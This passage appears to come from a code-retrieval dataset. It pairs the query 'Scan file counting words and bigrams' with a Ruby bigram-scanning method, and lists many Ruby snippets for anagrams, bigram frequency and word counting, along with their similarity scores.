"def combine_anagrams(words)\r\n\tswords = Array.new\r\n\tnoDups = Array.new\r\n\tgroupWords = Array.new\r\n\tanagrams = Array.new\r\n\twords.each {|word| swords << word.downcase.chars.sort.join}\r\n\tswords.each{|word| noDups << word unless !noDups.index(word).nil? }\r\n\tnoDups.each do|tword|\r\n\t\t\t\t\t\r\n\t\t\t\t\tgroupWords = Array.new\r\n\t\t\t\t\twords.each {|word| groupWords << word unless word.downcase.chars.sort.join != tword}\r\n\t\t\t\t\tanagrams << groupWords\r\n\t\t\t\tend\r\n\t\t\t\t\r\n\treturn anagrams\r\nend",
"def scramble(str1, str2)\n str1_chars = str1.chars\n str2_chars = str2.chars\n\n str2_chars.all? do |char|\n str1_chars.count(char) >= str2_chars.count(char)\n end\nend",
"def word_unscrambler(str, words)\n str_letters = str.split(\"\").sort\n\n res = []\n words.each do |word|\n word_letters = word.split(\"\").sort\n res << word if str_letters == word_letters\n end\n\n res\nend",
"def anagrams?(word1, word2)\r\n return charCount(word1) == charCount(word2)\r\nend",
"def combine_anagrams(words)\n\th = Hash.new{|hash, key| hash[key] = Array.new;}\n\twords.each do |word| h[word.downcase.split(//).sort.join] << word end\n\th.values \nend",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigrams[str[i..i+1]] += 1 \n i += 1\n end\n\n max_num = 0\n max = nil\n\n bigrams.each do |k,v|\n if v > max_num\n max_num = v\n max = k\n end\n end\n max\nend",
"def anagramI?(str1, str2)\n anagrams = str1.split(\"\").permutation.to_a.map { |anagram| anagram.join(\"\") }\n anagrams.include?(str2)\nend",
"def find_anagrams(base, words_list)\n words_list.select { |word| word.split('').sort == base.split('').sort }\nend",
"def find_anagrams(base, words_list)\n words_list.select { |word| word.split('').sort == base.split('').sort }\nend",
"def combine_anagrams(words)\n anagrams = []\n available_words = words\n words.each do |e|\n group = []\n temp_words = []\n anagram_invariant = e.downcase.chars.sort.join\n available_words.each do |i|\n test = i.downcase.chars.sort.join\n if test == anagram_invariant\n group.push(i)\n else\n temp_words.push(i)\n end\n end\n if(!group.empty?)\n anagrams.push(group)\n end\n available_words = temp_words\n end\n return anagrams\nend",
"def StringScramble(str1,str2)\n\n a_str1 = str1.split(\"\")\n a_str2 = str2.split(\"\")\n count = 0 \n \n a_str2.each do |letter|\n if a_str1.include?(letter)\n count += 1\n end\n end\n \n return count == a_str2.length ? true : false\n \nend",
"def first_anagram(word1, word2) #the worst \r\n word1.chars.permutation.to_a.any? { |sub| sub.join == word2 } \r\nend",
"def most_frequent_bigram(str)\n sub_str_arr = []\n bigram_count = Hash.new(0)\n str.each_char.with_index do |char,idx|\n if idx+1 != nil && str[idx..idx+1].length ==2\n sub_str_arr << str[idx..idx+1]\n end\n end\n sub_str_arr.each {|bigram| bigram_count[bigram]+=1}\n \n sorted = bigram_count.sort_by {|key,value| value}\n sorted [-1][0]\n\n\nend",
"def most_frequent_bigram(str)\n n, hash, res, ct = str.length, Hash.new(0), \"\", 0\n (0...n).each do |i|\n break if i + 2 > n\n w = str[i..(i + 1)]\n hash[w] += 1\n if(ct < hash[w])\n ct = hash[w]\n res = w\n end\n end\n res\nend",
"def gen_bigrams(a)\n bigrams = a.zip(a[1..-1])\n bigrams.pop # remove last useless one [lastitem, nil]\n return bigrams\nend",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n (0...str.length-1).each{|i| bigrams[ str[i..i+1] ] += 1}\n max = bigrams.first[0] # Hash#first returns first key value pair in an array\n bigrams.each {|key,val| max = key if val > bigrams[max]}\n # bigrams.sort_by{|b, v| v}.last[0]\n max\nend",
"def combine_anagrams(words)\r\n hash = Hash.new([])\r\n anagrams = []\r\n words.each do |word|\r\n keyword = word.downcase.chars.sort.join\r\n hash[keyword] += [word]\r\n end\r\n hash.each_value do |words|\r\n anagrams += [words]\r\n end\r\n return anagrams\r\nend",
"def combine_anagrams(words)\r\n words.group_by{|w| w.downcase.chars.sort.to_s}.values\r\nend",
"def create_title(word)\n\tcurrent = word\n\tword_num = 1 # begin word number at one\n\ttitle = \"\" # title begins as empty\n\ttitle += word # add current word\n\twhile word_num !=20 # while we have less than 20 words...\n\t\t\tif ($bigrams.has_key?(current)) # if the word exists in the bigram\n\t\t\t\tif (mcw(current) == nil)\n\t\t\t\t\t# do nothing and exit\n\t\t\t\t\tword_num = 20\n\t\t\t\telse\n\t\t\t\t\taddition = mcw(current) # thing to add is mcw\n\t\t\t\t\ttitle += \" \" # add space for readability\n\t\t\t\t\ttitle += addition # add addition to the title\n\t\t\t\t\tcurrent = addition # set current to the new wordtitle += addition # add the mcw\n\t\t\t\t\tword_num += 1 # increment by one and then go throuh\n\t\t\t\tend\n\t\t\telse word_num = 20 # otherwise, we exit\n\t\t\tend\n\t\tend\n\t\treturn title\nend",
"def anagrams?(word1, word2)\n\treturn char_count(word1) == char_count(word2)\n \nend",
"def anagrams?(word1, word2)\n\treturn hashLetters(word1) == hashLetters(word2)\nend",
"def scramble_words(chars = WordChars)\n\t\tgsub(/(#{chars})(#{chars}+)(?=#{chars})/) { $1 + $2.randomize }\n\tend",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index do |char, idx|\n key = char + str[idx + 1] if idx < str.length - 1\n hash[key] += 1\n end\n\n hash.key(hash.values.max)\nend",
"def combine_anagrams(words)\n\twords.collect do |w|\n\t\twords.find_all { |w2| w.split(//).sort.eql? w2.split(//).sort }.sort.uniq\n\tend.uniq\nend",
"def combine_anagrams(words)\n\n\twords.group_by{|word| word.downcase.chars.sort}.values\n\t\nend",
"def making_anagrams(string1, string2)\n matching_chars = 0\n visited_chars = Hash.new\n \n longest_string = string1.length > string2.length ? string1 : string2\n \n longest_string.each_char do |ch|\n if visited_chars[ch]\n next\n else\n visited_chars[ch] = true\n matching_chars += [string1.count(ch), string2.count(ch)].min\n end\n end\n \n string1.length + string2.length - matching_chars * 2\nend",
"def combine_anagrams(words)\n\t[] unless words.empty?\n\tcombine = Hash.new\n\twords.each do |word|\n\t\tsorted = word.downcase.chars.sort.join\n\t\tif combine.has_key?(sorted)\n\t\t\tcombine[sorted] << word\n\t\telse\n\t\t\tcombine[sorted] = [word]\n\t\tend\t\n\tend\n\tcombine.values\nend",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index do |char, idx|\n hash[str[idx..idx+1]] += 1\n end\n max = 0\n max_bigram = \"\"\n hash.each_pair do |key, value|\n if value > max\n max_bigram = key\n max = value\n end\n end\n return max_bigram\nend",
"def combine_anagrams(words)\n words_hash = Hash.new{ |hash, key| hash[key] = [] }\n words.each { |word| word_key = word.downcase.chars.sort.join; words_hash[word_key] = words_hash[word_key] << word; }\n words_list = Array.new()\n words_hash.keys.each { |key| words_list << words_hash[key] }\n return words_list\nend",
"def pig_it_ms_two(str)\n pig = []\n str.split.each do |w|\n pig << w.chars.rotate.join + \"ay\" if w =~ /\\w/\n pig << w if w =~ /\\W/\n end\n pig.join(\" \")\nend",
"def combine_anagrams(words)\n Array anagrams = []\n words.each {|x|\n flag = false\n anagrams.collect {|y|\n if x.downcase.chars.to_a.sort == y[0].downcase.chars.to_a.sort then\n y << x\n flag = true\n break\n end\n }\n unless flag; anagrams << [x] end \n }\n anagrams\nend",
"def check_anagrams(first_words, second_words)\n first_words.each_with_index do |word, index|\n if word.split('').sort == second_words[index].split('').sort\n puts true\n else\n puts false\n end\n end\nend",
"def combine_anagrams(words)\n groups = Hash.new\n words.each do |word|\n (groups[word.downcase.chars.sort.join] ||= []) << word\n end\n groups.flatten.values_at(* groups.flatten.each_index.select {|i| i.odd?})\nend"
] | [
"0.74516493",
"0.7052047",
"0.6946647",
"0.6575785",
"0.6469979",
"0.631926",
"0.6299341",
"0.6281823",
"0.62817293",
"0.62425333",
"0.6229352",
"0.62130743",
"0.6211819",
"0.6171229",
"0.6164704",
"0.6155376",
"0.61261",
"0.6066925",
"0.606135",
"0.6058965",
"0.6058319",
"0.60513663",
"0.60434484",
"0.60297346",
"0.60222405",
"0.6014891",
"0.600631",
"0.6003527",
"0.6002725",
"0.5997071",
"0.59935856",
"0.5979452",
"0.59788907",
"0.5971336",
"0.5964855",
"0.5958162",
"0.5955581",
"0.5954827",
"0.5953136",
"0.59483",
"0.5923533",
"0.59189284",
"0.5918547",
"0.5918188",
"0.5917184",
"0.5904928",
"0.5897972",
"0.58977115",
"0.5897609",
"0.58954495",
"0.58935046",
"0.58786726",
"0.5876727",
"0.5876727",
"0.58737105",
"0.5867961",
"0.5856658",
"0.5856003",
"0.5856003",
"0.5856003",
"0.5849327",
"0.5844352",
"0.58382666",
"0.5836301",
"0.5836015",
"0.5836015",
"0.58326626",
"0.5825694",
"0.5820862",
"0.58202946",
"0.5813009",
"0.58127105",
"0.5811404",
"0.5810008",
"0.58070403",
"0.5797964",
"0.5797964",
"0.5797573",
"0.5794222",
"0.57891643",
"0.57842255",
"0.57814896",
"0.5780216",
"0.57769847",
"0.57751375",
"0.57721585",
"0.5770621",
"0.5767358",
"0.5763367",
"0.57632375",
"0.5762269",
"0.57618284",
"0.57386583",
"0.57349217",
"0.57309127",
"0.5730163",
"0.57300186",
"0.5729347",
"0.57249683",
"0.57223684",
"0.5718432"
] | 0.0 | -1 |
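The positive document for this record keys a Hash on a two-element word array, `@table[[word1,word2]]`, and the `matching_bigrams` negative above reads the same table through a per-word index. A minimal self-contained sketch of that structure, with assumed names (`BigramTable`, `add`) that do not come from the record itself:

# Bigrams stored under composite [word1, word2] keys; Ruby arrays
# implement #hash and #eql?, so a two-word array is a valid Hash key.
class BigramTable
  def initialize
    @table = {}                              # [word1, word2] => data
    @index = Hash.new { |h, k| h[k] = [] }   # word1 => [word2, ...]
  end

  def add(word1, word2, data)
    @table[[word1, word2]] = data
    @index[word1] << word2
  end

  # Get a bigram given both words, as in the record's document.
  def get(word1, word2)
    @table[[word1, word2]]
  end

  # All bigrams that start with word1, as in matching_bigrams above.
  def matching_bigrams(word1)
    @index[word1].map { |word2| @table[[word1, word2]] }
  end
end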
Scan file counting words and bigrams. | def scan
$stderr.print "[bigrams] "
last = nil
bigram_files.each do |file|
$stderr.print "."
text = File.read(file).gsub("\n", " ")
states = text.split(/[.,:;?!()"]\s*/)
states.each do |state|
state.scan(WORD) do |word|
word = normalize(word)
if valid_word?(word)
if last && good_bigram?(word)
add(last, word, file)
end
last = word
else
last = nil
end
end
last = nil
end
last = nil
end
$stderr.puts
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def word_count_a_file(file_path)\nend",
"def word_count_a_file(file_path)\n word_count = 0\n f = File.open(file_path, \"r\")\n f.each_line {|line|\n word_count += line.to_s.split.size\n }\n word_count\nend",
"def word_count_a_file(file_path)\n\tfile = File.new(file_path,'r')\n\tfile.read.count(\" \")+1 \nend",
"def count_danger_dave_faults\n danger_dave_es = '/Users/michael/Desktop/language_files/danger_dave_inflection_freqs/content/2016/es/es_full.txt'\n bw_count = File.new('./bw_count.txt', 'w+')\n not_found_count = File.new('./not_found_count.txt', 'w+')\n File.readlines(danger_dave_es).each do |word_n_freq|\n if $. == 100\n break\n end\n word_n_freq_arr = word_n_freq.split(' ')\n word = word_n_freq_arr[0]\n hit_count = word_n_freq_arr[1]\n bw_exists = BaseWord.find_by(base_word: word)\n # headers for bw_count file: base_word, hit_count, (inflection), base_word_id\n # headers for not_found_count file: inflection, hit_count\n if bw_exists\n bw_count.puts word + ' ' + hit_count + ' ' + '(' + word + ')' + ' ' + bw_exists.id\n else\n inflection_exists = Inflection.find_by(word: word)\n if inflection_exists\n bw_id = inflection_exists.base_word_id\n bw = BaseWord.find(bw_id).base_word\n bw_count.puts base_word + ' ' + hit_count + ' ' + '(' + word + ')' + ' ' + bw_id\n else\n not_found_count.puts word + ' ' + hit_count\n end\n end\n end\nend",
"def file_reader file_name\n @words_count = {}\n File.read(file_name).each_line{ |line| count_words( line.split(',')[2] ) }\n hash_to_file(@words_count, file_name)\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tall = Hash.new\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# do something for each line\n\t\t\ttitle = cleanup_title(line)\n\t\t\tunless title.nil?\n\t\t\t\tgram = title.split().each_cons(2).to_a\n\t\t\t\tgram = gram.map{ |n| n.join(' ') }\n \t\t\t\tgram = gram.each_with_object(Hash.new(0)) { |word, obj| obj[word] += 1 }\n \t\t\t\tif gram.any?\n\t \t\t\t\tall.merge!(gram) { |k, old, new| old + new }\n\t \t\t\tend\n\t\t\tend\n\t\tend\n\t\t$bigramsArray = all.sort_by { |k, v| -v }\n\t\tcreate_hash()\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def process\n tokenize(text).each do |word|\n token = TfIdfSimilarity::Token.new word\n if token.valid?\n @term_counts[token.lowercase_filter.classic_filter.to_s] += 1\n end\n end\n @size = term_counts.values.reduce(:+)\n end",
"def generate_counts(data)\n counts = {}\n data.each do |line|\n unigram = nil\n bigram = nil\n trigram = nil\n\n # prepend buffering ghost values so we can represent trigrams of the first word\n tokens = line.split(' ')\n\n # take a sliding window of the entire line, generating grams as we go\n (1..(tokens.size-1)).to_a.each do |i|\n unigram = tokens[i..i]\n bigram = tokens[i-1..i]\n trigram = tokens[i-2..i]\n\n counts.store(unigram, counts.fetch(unigram, 0) + 1)\n counts.store(bigram, counts.fetch(bigram, 0) + 1)\n counts.store(trigram, counts.fetch(trigram, 0) + 1)\n end\n end\n counts\nend",
"def word_count_a_file(file_path)\n total = 0\n file = File.new(file_path, \"r\")\n file.readlines.each do |x|\n total += x.split.size\n end\n total\nend",
"def word_count(file)\n wc = Hash.new(0)\n File.open(file, 'r') do |f|\n f.each_line do |line|\n line.split.each do |word|\n word = word.gsub(/[^a-zA-Z]/, '').downcase\n wc[word.to_sym] += 1\n end\n end\n end\n wc\nend",
"def lexigram_counter(sequencetext)\n @sequencetext = sequencetext\n\t@lexigrams = lexigram_searcher(@sequencetext)\n\tif (@lexigrams === [\"no letters remain after processing\"])\n\t @lexigrams_count = 0\n else\n @lexigrams_count = @lexigrams.count.to_s\n end\n end",
"def word_count_a_file(file_path)\n File.read(file_path).split(' ').length\n # had to create the file, text taken from https://www.lipsum.com/feed/html\nend",
"def process_words\n reset_counts\n # iterate through radlib_array and add counts\n self.each do |w|\n Rails.logger.debug(w.inspect)\n case w[\"type\"]\n when \"word\"\n @num_words += 1\n if w[\"selectable\"] && w[\"selected\"]\n @num_blanks += 1\n # fix for old radlibs\n unless w[\"user_pos\"]\n w[\"user_pos\"] = w[\"predicted_pos\"]\n end\n type = w[\"user_pos\"].gsub(\"-\", \"_\").to_sym\n Rails.logger.debug(type)\n @num_blanks_by_type[type] += 1\n end\n when \"whitespace\"\n # don't need to do anything here\n when \"punc\"\n @num_sentences += 1 if w[\"text\"] == \".\" || w[\"text\"] == \"!\" || w[\"text\"] == \"?\"\n end\n end\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\t\t\t\t\t\t\t\t\t\t\t\t\t#for each line\n\t\t\ttitle = cleanup_title(line)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#clean up title\n\t\t\tif title != nil\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#unless the title doesnt exist\n\t\t\t\twords = title.split(/\\s/)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#split the title into seperate words and remove all the stop words mentioned in the lab\n\t\t\t\twords.delete(\"a\")\n\t\t\t\twords.delete(\"an\")\n\t\t\t\twords.delete(\"and\")\n\t\t\t\twords.delete(\"by\")\n\t\t\t\twords.delete(\"for\")\n\t\t\t\twords.delete(\"from\")\n\t\t\t\twords.delete(\"in\")\n\t\t\t\twords.delete(\"of\")\n\t\t\t\twords.delete(\"on\")\n\t\t\t\twords.delete(\"or\")\n\t\t\t\twords.delete(\"out\")\n\t\t\t\twords.delete(\"the\")\n\t\t\t\twords.delete(\"to\")\n\t\t\t\twords.delete(\"with\")\n\t\t\t\t(0..words.size-2).each do |i|\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# for the size of the words array minus two because we dont want to check bigrams of the last word\n\t\t\t\t\tif $bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"].nil?\t\t\t\t\t\t\t\t\t\t#if the first layer doesnt contain the current word, add it with it's following word with a value of 1\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"].store(\"#{words[i+1]}\", 1)\n\t\t\t\t\telse\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#otherwise, increment the value of the following key word\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"] += 1\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\t#p $bigrams.values.inspect\n\t\tend\n\t\t#puts mcw(\"a\")\n\t\tputs \"Finished. Bigram model built.\\n\"\n\t#rescue\n\t\t#STDERR.puts \"Could not open file\"\n\t\t#exit 4\n\tend\nend",
"def process_file(file_name)\r\n\tputs \"Processing File.... \"\r\n\r\n\tbegin\r\n\t\tcounter = Hash.new\r\n\t\tfile = File.open(file_name)\r\n\t\tuntil file.eof?\r\n\t\t\tfile.each_line do |line|\r\n\t\t\t\t# do something for each line\r\n\t\t\t\ttitle = cleanup_title(line)\r\n\t\t\t\tunless(title == \"\")\r\n\t\t\t\t\tbigram = title.split().each_cons(2).to_a\r\n\t\t\t\t\tbigram = bigram.map{ |n| n.join(' ')}\r\n\t\t\t\t\tbigram = bigram.each_with_object(Hash.new(0)){|word, obj| obj[word] += 1}\r\n\t\t\t\t\tif bigram.any?\r\n\t\t\t\t\t\tcounter.merge!(bigram) { |k, old, new| old + new}\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\t\tfile.close\r\n\r\n\t\t$bigramsArray = counter.sort_by { |k, v| -v }\r\n\t\tcreate_hash()\r\n\t\t#$bigrams = $bigrams.to_h\r\n\r\n\t\t#$bigramsHash = Hash.new\r\n\t\t#$bigramsHash = $bigrams.to_h\r\n \t#$bigrams.each { |k, v| puts \"#{v} => #{k}\"}\r\n\r\n\r\n\t\tputs \"Finished. Bigram model built.\\n\"\r\n\trescue\r\n\t\tSTDERR.puts \"Could not open file\"\r\n\t\texit 4\r\n\tend\r\n\r\nend",
"def print_text_statistics (text)\n\n=begin\n\t\ttext = ''\n\t\tline_count = 0\n\t\tFile.open(\"text.txt\").each do |line|\n\n\t\t\tline_count += 1\n\t\t\ttext << line\n\t\tend #Here I'm using the File class's .open(dir) to open up a file\n\t\t #that is located at an specific directory and then I'm looping\n\t\t #trough its content with a .each{} method.\n\t\t#puts \"#{line_count} lines\"\n=end\n\n\t#the File class has a method that allows you to read the lines on a text file more efficiently\n\t#it has the .readlines(dir); this method returns an array with the readed file\n\tstop_words = %w{the a by on for of are just with but and to the my I has some in}\n\tline = File.readlines(text[0]) #receives the parameter passed on the command line and holds it into the first \n\t #position of the ARGV array. This is an special array\n\tline_count = line.size\n\ttext = line.join\n\ttotal_characters = text.length\n\ttotal_characters_nospace = text.gsub(/\\s+/,'').length\n\tword_count = text.split.length\n\tparagraph_count = text.split(/\\n\\n/).length\n\tsentence_count = text.split(/\\?|\\.|!/).length\n\tall_words = text.scan(/\\w+/)\n\tgood_words = all_words.select {|word| !stop_words.include?(word)} #the .select method can be applied to arrays,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t #hases and ranges and is used to return an object of those types\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t #that stiesfied the conditional statement written whithin the blockb (it's a filter)\n\tgood_percentage = ((good_words.length.to_f/all_words.length.to_f)*100).to_i\n\tsentences = text.gsub(/\\s+/,' ').strip.split(/\\?|\\.|!/) #strip deletes the first and the last blank strip of spaces\n\tsentences_sorted = sentences.sort_by { |sentence| sentence.length } #sort an array, hash or range, by defining \n\t #a condition whithin the block. array.sort_by { |item| <condition> }\n\tone_third = sentences_sorted.length/3\n\tideal_sentences = sentences_sorted.slice(one_third, one_third + 1).select { |sentence| sentence =~ /is|are/}\n\n\tputs \"#{line_count} lines\"\n\tputs \"#{total_characters} characters\"\n\tputs \"#{total_characters_nospace} characters (excluding spaces)\"\n\tputs \"#{word_count} words\"\n\tputs \"#{paragraph_count} paragraphs\"\n\tputs \"#{sentence_count} sentences\"\n\tputs \"#{(sentence_count/paragraph_count).to_f} sentences per paragraph (average)\"\n\tputs \"#{(word_count/paragraph_count).to_f} words per paragraph (average)\"\n\tputs \"#{good_percentage}% of words are non fluff-words\"\n\tputs \"Summary:\\n\\n#{ideal_sentences.join('.')}\"\n\tputs \"-- End of analysis\"\n\nend",
"def mit_word_count\n read_file('LICENSE').split.map{|x| x.gsub(/[^a-z0-9]/i, '').downcase}\n .group_by{|x| x}.map{|k, v| [k, v.size]}.sort_by{|_, y| -y}\nend",
"def word_count_a_file(file_path)\n IO.read(file_path).split.length\nend",
"def run\n load_the_file\n word_frequency\n match_the_word\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# Pull title out of text line\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\tif not title.nil?\n\t\t\t # Split title into individual words\n\t\t\t words = title.split(\" \")\n\n\t\t\t\t# Remove stop words\n\t\t\t\tstop_words = ['a', 'an', 'and', 'by', 'for', 'from', 'in', 'of', 'on',\n\t\t\t\t\t 'or', 'out', 'the', 'to', 'with']\n\n\t\t\t\tfor i in 0..stop_words.length-1\n\t\t\t\t\twords.delete(stop_words[i])\n\t\t\t\tend\n\n\t\t\t\t# Count subsequent words\n\t\t\t\tfor i in 0..words.length-2\n\t\t\t\t\t$bigrams[words[i]][words[i+1]] += 1\n\t\t\t\tend\n\t\t\tend\n\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# call cleanup_title method to extract song titles\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\t#ignore titles with non-english characters\n\t\t\tif title[/(\\w|\\s|\\')*/] == title\n\t\t\t\ttitle = title.split\n\t\t\t\ti = 0;\n\n\t\t\t\twhile i <= title.size-1 #loop through array of words\n\t\t\t\t\thasKey = $bigrams[title[i]] #first word\n\t\t\t\t\thasChild = $bigrams[title[i]] && $bigrams[title[i]][title[i+1]] #second word that follows first\n\t\t\t\t\tbreak if title[i+1].nil? #break if this is the last word in the array\n\n\t\t\t\t\tif hasChild #if child of primary key exists, add one to the count\n\t\t\t\t\t\t$bigrams[title[i]][title[i+1]] += 1;\n\t\t\t\t\telsif hasKey #if primary key exists, add new child with initial count = 1\n\t\t\t\t\t\t$bigrams[title[i]][title[i+1]] = 1;\n\t\t\t\t\telse #if primary key does not exist, add it and child key\n\t\t\t\t\t\t$bigrams[title[i]] = {title[i+1] => 1};\n\t\t\t\t\tend\n\t\t\t\t\ti += 1;\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\t end\nend",
"def process_file(file_name)\n\tbegin\n\t\tif RUBY_PLATFORM.downcase.include? 'mswin'\n puts \"Processing File.... \"\n\t\t\tfile = File.open(file_name)\n\t\t\tunless file.eof?\n\t\t\t\tfile.each_line do |line|\n\t\t\t\t\t# do something for each line (if using windows)\n \n\t\t\t\tend\n\t\t\tend\n\t\t\tfile.close\n\t\telse\n\t\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\n\t\t\t\t# Clean Title\n clean_title = cleanup_title(line)\n\t\t\t\t# Split title into words\n\t\t\t\tif clean_title != nil\n\t\t\t\t\t# Array of words in the title\n\t\t\t\t\twords = clean_title.split(' ', 30)\n\t\t\t\t\twords.delete(\"\")\n\t\t\t\t\t\t# For every word in the title\n\t\t\t\t\t\tfor i in 0..words.length - 1\n\t\t\t\t\t\t# \tIf word is not already in first hash as a key\n\t\t\t\t\t\t\tif !$bigrams.key?(words[i])\n\t\t\t\t\t\t\t\t# If it is not the last word in the title\n\t\t\t\t\t\t\t\tif words[i] != words.last\n\t\t\t\t\t\t\t\t\t# Insert first word into hash as key, with a new hash containing next word as key and 1 as value\n\t\t\t\t\t\t\t\t\t$bigrams[words[i]] = {words[i+1] => 1}\n\t\t\t\t\t\t\t\t# Else it is the last word in the title\n\t\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t\t\t$bigrams[words[i]] = Hash.new\n\t\t\t\t\t\t\t\tend\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t# Else word is already in first hash \n\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t\t# If word is not the last word in title\n\t\t\t\t\t\t\t\tif words[i] != words.last\n\t\t\t\t\t\t\t\t\t# If nested hash contains second word as a key\n\t\t\t\t\t\t\t\t\tif $bigrams[words[i]].key?(words[i+1])\n\t\t\t\t\t\t\t\t\t\t# Increase value that corresponds with second word\n\t\t\t\t\t\t\t\t\t\t$bigrams[words[i]][words[i+1]] += 1\n\t\t\t\t\t\t\t\t\t# Else word that follows is not in second hash\n\t\t\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t\t\t\t# Insert second word as key in second hash and set value to 1\n\t\t\t\t\t\t\t\t\t\t$bigrams[words[i]][words[i+1]] = 1\n\t\t\t\t\t\t\t\t\tend\n\t\t\t\t\t\t\t\tend\n\t\t\t\t\t\t\t\t# Else word is last word in title, no words follow\n\t\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue => exception\n\t\tp exception.backtrace\n\t\traise\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def file_process(file)\n\n stop_words = File.read('stop_words.txt').split(\"\\n\")\n\n lines = File.readlines(file)\n title = lines[0]\n speech = lines[1..-1]\n line_count = speech.size\n text = speech.join\n char_count = text.length\n char_count_nospaces = text.force_encoding('UTF-8').gsub(/\\s+/, '').length\n word_count = text.scan(/\\w+/).length\n sentence_count = text.split(/\\.|\\?|!/).length\n average_words_sentence = word_count / sentence_count\n paragraph_count = text.split(/\\n\\n/).length\n word_frequency_hash = {}\n word_frequency_top = []\n\n text.split().each do |word|\n unless stop_words.include?(word.downcase)\n if word_frequency_hash.has_key?(word.downcase)\n word_frequency_hash[word.downcase] += 1\n else\n word_frequency_hash[word.downcase] = 1\n end\n end\n end\n\n non_fluff_words = (word_frequency_hash.size.to_f / word_count.to_f * 100).to_i\n\n array_of_sentences = text.scan(/[^\\.!?]+[\\.!?]/).map(&:strip).sort_by { |sentence| sentence.length }\n ideal_sentences = array_of_sentences[array_of_sentences.length/3..array_of_sentences.length - array_of_sentences.length/3]\n\n word_frequency = word_frequency_hash.sort_by { |key, value| value}.reverse\n word_frequency.flatten.each_with_index { |word, index| word_frequency_top << word if index.even? }\n\n puts \"#{title}\"\n puts \"#{line_count} lines\"\n puts \"#{char_count} characters\"\n puts \"#{char_count_nospaces} characters excluding spaces\"\n puts \"#{word_count} words\"\n puts \"#{sentence_count} sentences\"\n puts \"#{paragraph_count} paragraphs\"\n puts \"#{average_words_sentence} words per sentence (average)\"\n puts \"#{word_frequency_hash.size} non-fluff words\"\n puts \"roughly #{non_fluff_words} percent non-fluff words.\"\n puts \"Top 10 non-fluff words: #{word_frequency_top.take(10)} top 10 non-fluff words.\"\n puts \"Ideal sentences array: #{ideal_sentences.take(7) }\"\n puts\n puts\n\nend",
"def check_file\n # Read dictionary\n @word_list = File.open(@infile)\n @word_list.each do |word|\n w = Word.new(word.chop)\n # Check each token from word\n w.get_tokens.each do |seq|\n if check_sequence(seq) # Returns true if unique so far\n # Add to sequences array\n @found_sequences[seq] = word.chop\n @seq_count = @seq_count + 1\n end\n end\n end\n return @seq_count\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\n\t\t\ttitle = cleanup_title(line)\n\t\t\t# If the title is valid continue\n\t\t\tif title != nil\n\t\t\t\t# Split the title into words\n\t\t\t\twords = title.split(\" \")\n\t\t\t\tw_index = 0\n\t\t\t\t# Remove the stop words\n\t\t\t\twords = words - %w{a an and by for from in of on or out the to with}\n\t\t\t\t# If there is more than one word in a title add to biagram\n\t\t\t\tif words.length > 1\n\t\t\t\t\twords.each do |w|\n\t\t\t\t\t\t# If there is no base word add it\n\t\t\t\t\t\tif $bigrams[w] == nil\n\t\t\t\t\t\t\t$bigrams[w] = Hash.new\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] = 1\n\t\t\t\t\t\t# Else if there is no word following the word add it\n\t\t\t\t\t\telsif $bigrams[w][words[w_index + 1]] == nil\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] = 1\n\t\t\t\t\t\t# Else increment the count of the word following\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] += 1\n\t\t\t\t\t\tend\n\t\t\t\t\t\tw_index += 1\n\t\t\t\t\t\t# 